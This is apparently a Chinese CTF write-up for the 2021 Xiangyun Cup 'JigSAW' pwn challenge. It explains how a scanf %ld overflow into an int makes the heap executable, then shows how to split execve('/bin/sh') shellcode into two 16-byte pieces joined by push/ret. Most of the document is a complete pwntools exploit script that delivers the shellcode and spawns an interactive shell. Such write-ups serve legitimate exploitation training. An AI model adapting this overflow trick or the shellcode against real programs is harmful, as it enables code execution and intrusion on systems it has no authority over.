2021祥云杯JigSAW
保护全开
在sub_15F0函数存在溢出
scanf格式化字符%ld读的是long int ,v1是int,能溢出4个字节,我们溢出使v2大于0xE,给heap加0x1000长度的可读可写可执行权限
接着看test函数
对应的汇编
所以我们往堆里写shellcode就行,不过每次只能0x10-1,可以分两次去写入shellcode,用汇编相连
值得注意的是’\xc3’对应的汇编是ret
可以push rdx利用ret
不用ret也行,jmp rdx 即可
还有其他的做法,syscall一个read,利用当时的寄存器值,减少汇编可刚好达0x10长度,然后读入shellcode
exp:
from pwn import *
local_file = './JigSAW'
local_libc = './libc.so'
remote_libc = './libc.so'
select = 0
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
elif select == 1:
r = remote('node4.buuoj.cn',25904 )
libc = ELF(remote_libc)
else:
r = gdb.debug(local_file)
libc = ELF(local_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
def debug(cmd=''):
gdb.attach(r,cmd)
#--------------------------
def add(idx):
sla('Choice : \n','1')
sla('Index? : \n',str(idx))
def edit(idx,content):
sla('Choice : \n','2')
sla('Index? : \n',str(idx))
sa('iNput:\n',content)
def test(idx):
sla('Choice : \n','4')
sla('Index? : \n',str(idx))
#------------------------
sla('Name:\n','nq')
sla('Make your Choice:\n',str(0x100000000))
shell1=asm('''
mov rbx, 0x68732f6e69622f
add rdx,0x20
push rdx
''')
shell2=asm('''
push rbx
push rsp
pop rdi
xor esi, esi
xor edx, edx
push 0x3b
pop rax
syscall
''')
add(1)
add(2)
edit(1,shell1)
edit(2,shell2)
test(1)
r.interactive()